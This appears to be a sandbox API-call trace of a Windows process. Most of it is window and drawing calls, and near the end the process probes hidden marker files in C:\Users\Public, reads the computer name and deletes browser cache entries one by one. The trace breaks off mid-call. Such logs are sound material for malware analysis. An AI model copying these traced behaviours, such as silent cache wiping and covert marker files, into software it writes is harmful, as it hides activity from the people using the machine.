[0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] GetCurrentThreadId () returned 0xc04 [0039.744] IsWindowVisible (hWnd=0x10166) returned 0 [0039.744] IsIconic (hWnd=0x10166) returned 0 [0039.744] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff2a0 | out: lpRect=0x68ff2a0) returned 1 [0039.744] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.744] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x47, wParam=0x0, lParam=0x68ff634) returned 0x0 [0039.744] IsIconic (hWnd=0x10166) returned 0 [0039.744] GetWindowRect (in: hWnd=0x10166, lpRect=0x68fed4c | out: lpRect=0x68fed4c) returned 1 [0039.744] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x5, wParam=0x0, lParam=0xca00b2) returned 0x0 [0039.745] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68fed7c, fWinIni=0x0 | out: pvParam=0x68fed7c) returned 1 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] IsIconic (hWnd=0x10166) returned 0 [0039.745] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed60 | out: lpRect=0x68fed60) returned 1 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] IsIconic (hWnd=0x10166) returned 0 [0039.745] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed60 | out: lpRect=0x68fed60) returned 1 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] IsIconic (hWnd=0x10166) returned 0 [0039.745] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.745] IsIconic (hWnd=0x10166) returned 0 [0039.745] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.745] FlatSB_SetScrollProp (param_1=0x10166, index=0x100, newValue=0x0, param_4=0) returned 0 [0039.745] GetSysColor (nIndex=20) returned 0xffffff [0039.745] FlatSB_SetScrollProp (param_1=0x10166, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0039.745] FlatSB_SetScrollInfo (param_1=0x10166, code=1, psi=0x68fed6c, fRedraw=1) returned 0 [0039.746] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.746] IsIconic (hWnd=0x10166) returned 0 [0039.746] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.746] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.746] IsIconic (hWnd=0x10166) returned 0 [0039.746] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.746] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.746] IsIconic (hWnd=0x10166) returned 0 [0039.746] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.747] FlatSB_SetScrollProp (param_1=0x10166, index=0x200, newValue=0x0, param_4=0) returned 0 [0039.747] GetSysColor (nIndex=20) returned 0xffffff [0039.747] FlatSB_SetScrollProp (param_1=0x10166, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0039.747] FlatSB_SetScrollInfo (param_1=0x10166, code=0, psi=0x68fed6c, fRedraw=1) returned 0 [0039.747] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.747] IsIconic (hWnd=0x10166) returned 0 [0039.747] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.747] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68ff230) returned 0x0 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.748] GetCurrentThreadId () returned 0xc04 [0039.749] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff65c, fWinIni=0x0 | out: pvParam=0x68ff65c) returned 1 [0039.749] IsIconic (hWnd=0x10166) returned 0 [0039.749] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff6e4 | out: lpRect=0x68ff6e4) returned 1 [0039.749] IsIconic (hWnd=0x10166) returned 0 [0039.749] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff6dc | out: lpRect=0x68ff6dc) returned 1 [0039.749] IsIconic (hWnd=0x10166) returned 0 [0039.749] SetWindowPos (hWnd=0x10166, hWndInsertAfter=0x0, X=-452, Y=-452, cx=194, cy=55, uFlags=0x14) returned 1 [0039.749] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x46, wParam=0x0, lParam=0x68ff634) returned 0x0 [0039.749] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x24, wParam=0x0, lParam=0x68ff064) returned 0x0 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.749] GetCurrentThreadId () returned 0xc04 [0039.750] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68ff608) returned 0x0 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] GetCurrentThreadId () returned 0xc04 [0039.750] IsWindowVisible (hWnd=0x10166) returned 0 [0039.750] IsIconic (hWnd=0x10166) returned 0 [0039.750] GetWindowRect (in: hWnd=0x10166, lpRect=0x68ff2a0 | out: lpRect=0x68ff2a0) returned 1 [0039.750] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.750] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x47, wParam=0x0, lParam=0x68ff634) returned 0x0 [0039.750] IsIconic (hWnd=0x10166) returned 0 [0039.750] GetWindowRect (in: hWnd=0x10166, lpRect=0x68fed4c | out: lpRect=0x68fed4c) returned 1 [0039.750] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.750] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x5, wParam=0x0, lParam=0x1100b2) returned 0x0 [0039.750] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68fed7c, fWinIni=0x0 | out: pvParam=0x68fed7c) returned 1 [0039.750] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.750] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.750] IsIconic (hWnd=0x10166) returned 0 [0039.750] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed60 | out: lpRect=0x68fed60) returned 1 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] IsIconic (hWnd=0x10166) returned 0 [0039.751] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed60 | out: lpRect=0x68fed60) returned 1 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] IsIconic (hWnd=0x10166) returned 0 [0039.751] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.751] IsIconic (hWnd=0x10166) returned 0 [0039.751] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.751] FlatSB_SetScrollProp (param_1=0x10166, index=0x100, newValue=0x0, param_4=0) returned 0 [0039.751] GetSysColor (nIndex=20) returned 0xffffff [0039.751] FlatSB_SetScrollProp (param_1=0x10166, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0039.751] FlatSB_SetScrollInfo (param_1=0x10166, code=1, psi=0x68fed6c, fRedraw=1) returned 0 [0039.752] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.752] IsIconic (hWnd=0x10166) returned 0 [0039.752] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.752] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.752] IsIconic (hWnd=0x10166) returned 0 [0039.752] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.752] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.752] IsIconic (hWnd=0x10166) returned 0 [0039.752] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.752] FlatSB_SetScrollProp (param_1=0x10166, index=0x200, newValue=0x0, param_4=0) returned 0 [0039.752] GetSysColor (nIndex=20) returned 0xffffff [0039.752] FlatSB_SetScrollProp (param_1=0x10166, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0039.752] FlatSB_SetScrollInfo (param_1=0x10166, code=0, psi=0x68fed6c, fRedraw=1) returned 0 [0039.753] GetWindowLongW (hWnd=0x10166, nIndex=-16) returned 114229248 [0039.753] IsIconic (hWnd=0x10166) returned 0 [0039.753] GetClientRect (in: hWnd=0x10166, lpRect=0x68fed30 | out: lpRect=0x68fed30) returned 1 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.753] GetCurrentThreadId () returned 0xc04 [0039.754] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0x83, wParam=0x1, lParam=0x68ff230) returned 0x0 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] GetCurrentThreadId () returned 0xc04 [0039.754] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x68ff65c, fWinIni=0x0 | out: pvParam=0x68ff65c) returned 1 [0039.755] IsIconic (hWnd=0x10166) returned 0 [0039.755] GetClientRect (in: hWnd=0x10166, lpRect=0x68ff6f4 | out: lpRect=0x68ff6f4) returned 1 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] GetCurrentThreadId () returned 0xc04 [0039.755] FreeResource (hResData=0x6e3a9ec) returned 0 [0039.755] GetDC (hWnd=0x0) returned 0x1901023f [0039.755] MoveToEx (in: hdc=0x1901023f, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.755] SelectObject (hdc=0x1901023f, h=0x130a01ce) returned 0x18a002e [0039.755] GetSysColor (nIndex=8) returned 0x0 [0039.755] SetTextColor (hdc=0x1901023f, color=0x0) returned 0x0 [0039.755] SelectObject (hdc=0x1901023f, h=0x1f3001b7) returned 0x1b00017 [0039.755] SetROP2 (hdc=0x1901023f, rop2=13) returned 13 [0039.755] UnrealizeObject (h=0x17100741) returned 1 [0039.755] SelectObject (hdc=0x1901023f, h=0x17100741) returned 0x1900010 [0039.755] SetBkColor (hdc=0x1901023f, color=0xffffff) returned 0xffffff [0039.755] SetBkMode (hdc=0x1901023f, mode=2) returned 2 [0039.755] GetSysColor (nIndex=8) returned 0x0 [0039.755] GetSysColor (nIndex=14) returned 0xffffff [0039.755] DrawThemeTextEx () returned 0x0 [0039.759] SelectObject (hdc=0x1901023f, h=0x1b00017) returned 0x1f3001b7 [0039.759] SelectObject (hdc=0x1901023f, h=0x1900015) returned 0x17100741 [0039.759] SelectObject (hdc=0x1901023f, h=0x18a002e) returned 0x130a01ce [0039.759] GetCurrentPositionEx (in: hdc=0x1901023f, lppt=0x68ff7b0 | out: lppt=0x68ff7b0) returned 1 [0039.759] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.760] GetDC (hWnd=0x0) returned 0x1901023f [0039.760] MoveToEx (in: hdc=0x1901023f, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.760] SelectObject (hdc=0x1901023f, h=0x130a01ce) returned 0x18a002e [0039.760] GetSysColor (nIndex=8) returned 0x0 [0039.760] SetTextColor (hdc=0x1901023f, color=0x0) returned 0x0 [0039.760] SelectObject (hdc=0x1901023f, h=0x1f3001b7) returned 0x1b00017 [0039.760] SetROP2 (hdc=0x1901023f, rop2=13) returned 13 [0039.760] UnrealizeObject (h=0x17100741) returned 1 [0039.760] SelectObject (hdc=0x1901023f, h=0x17100741) returned 0x1900010 [0039.760] SetBkColor (hdc=0x1901023f, color=0xffffff) returned 0xffffff [0039.760] SetBkMode (hdc=0x1901023f, mode=2) returned 2 [0039.760] GetSysColor (nIndex=8) returned 0x0 [0039.760] GetSysColor (nIndex=14) returned 0xffffff [0039.760] DrawThemeTextEx () returned 0x0 [0039.760] SelectObject (hdc=0x1901023f, h=0x1b00017) returned 0x1f3001b7 [0039.760] SelectObject (hdc=0x1901023f, h=0x1900015) returned 0x17100741 [0039.760] SelectObject (hdc=0x1901023f, h=0x18a002e) returned 0x130a01ce [0039.760] GetCurrentPositionEx (in: hdc=0x1901023f, lppt=0x68ff7b0 | out: lppt=0x68ff7b0) returned 1 [0039.760] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.760] GetDC (hWnd=0x0) returned 0x1901023f [0039.760] MoveToEx (in: hdc=0x1901023f, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0039.760] SelectObject (hdc=0x1901023f, h=0x130a01ce) returned 0x18a002e [0039.760] GetSysColor (nIndex=8) returned 0x0 [0039.761] SetTextColor (hdc=0x1901023f, color=0x0) returned 0x0 [0039.761] SelectObject (hdc=0x1901023f, h=0x1f3001b7) returned 0x1b00017 [0039.761] SetROP2 (hdc=0x1901023f, rop2=13) returned 13 [0039.761] UnrealizeObject (h=0x17100741) returned 1 [0039.761] SelectObject (hdc=0x1901023f, h=0x17100741) returned 0x1900010 [0039.761] SetBkColor (hdc=0x1901023f, color=0xffffff) returned 0xffffff [0039.761] SetBkMode (hdc=0x1901023f, mode=2) returned 2 [0039.761] GetSysColor (nIndex=8) returned 0x0 [0039.761] GetSysColor (nIndex=14) returned 0xffffff [0039.761] DrawThemeTextEx () returned 0x0 [0039.761] SelectObject (hdc=0x1901023f, h=0x1b00017) returned 0x1f3001b7 [0039.761] SelectObject (hdc=0x1901023f, h=0x1900015) returned 0x17100741 [0039.761] SelectObject (hdc=0x1901023f, h=0x18a002e) returned 0x130a01ce [0039.761] GetCurrentPositionEx (in: hdc=0x1901023f, lppt=0x68ff7b0 | out: lppt=0x68ff7b0) returned 1 [0039.761] ReleaseDC (hWnd=0x0, hDC=0x1901023f) returned 1 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] GetCurrentThreadId () returned 0xc04 [0039.761] SetEvent (hEvent=0x354) returned 1 [0039.761] SetEvent (hEvent=0x6b4) returned 1 [0039.761] FindWindowW (lpClassName=0x0, lpWindowName="k8w0") returned 0x0 [0039.761] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0039.762] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0xa, lParam=0x71dfd6c) returned 0x9 [0039.762] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xc, wParam=0x0, lParam=0x6dcfed0) returned 0x1 [0039.762] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xb012, wParam=0x0, lParam=0x0) returned 0x0 [0039.762] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0039.762] GetComputerNameW (in: lpBuffer=0x71dfd64, nSize=0x68ff5ec | out: lpBuffer="N3EERVTWSM", nSize=0x68ff5ec) returned 1 [0039.762] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\uc") returned 0xffffffff [0039.762] GetLastError () returned 0x2 [0039.762] KillTimer (hWnd=0x1015c, uIDEvent=0x1) returned 0 [0039.762] SetTimer (hWnd=0x1015c, nIDEvent=0x1, uElapse=0x927c0, lpTimerFunc=0x0) returned 0x1 [0039.762] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\ybb") returned 0xffffffff [0039.762] GetLastError () returned 0x2 [0039.762] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yne") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yit") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yst") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\ycx") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\git") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gbb") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gst") returned 0xffffffff [0039.763] GetLastError () returned 0x2 [0039.763] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gcx") returned 0xffffffff [0039.764] GetLastError () returned 0x2 [0039.764] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gne") returned 0xffffffff [0039.764] GetLastError () returned 0x2 [0039.765] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern=0x0, lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0x0 [0039.800] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern=0x0, lpFirstCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpFirstCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 0x1 [0039.800] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/mediawiki/img/mediawiki-stack-110x117-f30128764d4eb7f2ce77c30f52fd7555.png") returned 1 [0039.827] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.829] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.829] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/joomla/img/joomla-stack-110x117-8a9a94b53d6311c27c5d2f0153b5729e.png") returned 1 [0039.833] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.834] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.834] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/masthead_fill.png") returned 1 [0039.837] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.837] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.837] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/runtime.js") returned 1 [0039.839] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.840] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71b42e0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71b42e0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.840] DeleteUrlCacheEntryW (lpszUrlName="res://C:\\Windows\\system32\\mmcndmgr.dll/views.htm") returned 1 [0039.841] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.841] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.841] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/cmsmadesimple/img/cmsmadesimple-stack-110x117-25435d7aac444233454733d6a8cfd299.png") returned 1 [0039.842] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.842] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.842] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/masthead_left.png") returned 1 [0039.844] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.845] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.845] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/suitecrm/img/suitecrm-stack-110x117-fb65d4acdf91633002147c67db367153.png") returned 1 [0039.879] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.879] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.879] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/magento/img/magento-stack-110x117-a1c628a61d0dab4aba9575b44af2dc8e.png") returned 1 [0039.880] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.880] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.880] DeleteUrlCacheEntryW (lpszUrlName="https://d3qxef4rp70elm.cloudfront.net/m.js") returned 1 [0039.884] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.884] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.884] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/modx/img/modx-stack-110x117-c3f04ba1966fdc51fb2677c9e47c6f7f.png") returned 1 [0039.886] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.886] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.886] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.typekit.net/af/275e5f/000000000000000000017827/27/i?subset_id=2&fvd=n6") returned 1 [0039.887] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.887] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.888] DeleteUrlCacheEntryW 